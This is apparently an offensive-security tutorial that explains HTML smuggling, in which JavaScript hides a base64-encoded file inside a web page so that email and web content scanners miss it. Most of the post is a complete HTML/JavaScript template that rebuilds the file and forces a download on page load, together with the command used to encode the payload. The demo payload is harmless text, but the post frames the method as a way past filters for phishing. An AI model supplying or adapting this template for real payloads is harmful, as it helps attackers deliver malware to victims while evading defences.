HTML smuggling is a technique that uses JavaScript to hide files from content filters. If you send a phishing email with a download link, the HTML may look something like:
Email and web scanners are capable of parsing these out and taking some action. They may be removed entirely, or the URL content fetched and scanned by an AV sandbox. HTML smuggling allows us to get around this by embedded the payload into the HTML source code, and using JavaScript to construct URLs by the browser at runtime.
This is a simple boilerplate template based on work by Stan Hegt.
<html>
<head>
<title>HTML Smuggling</title>
</head>
<body>
<p>This is all the user will see...</p>
<script>
function convertFromBase64(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
var data = convertFromBase64(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'test.txt';
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>
\
As this goes over the wire, a scanner will only see HTML and JavaScript. There are no hardcoded hyperlinks and the content type of the page itself is just text/html.
The encoded content in the file variable was created with:
ubuntu@DESKTOP-3BSK7NO ~> echo -en "This is a smuggled file" | base64
\
When you visit this page, the browser will automatically reconstruct and download the file without any interaction from the user.
\
\
The Python HTTP server is a nice quick way to spin up a web server for testing.
\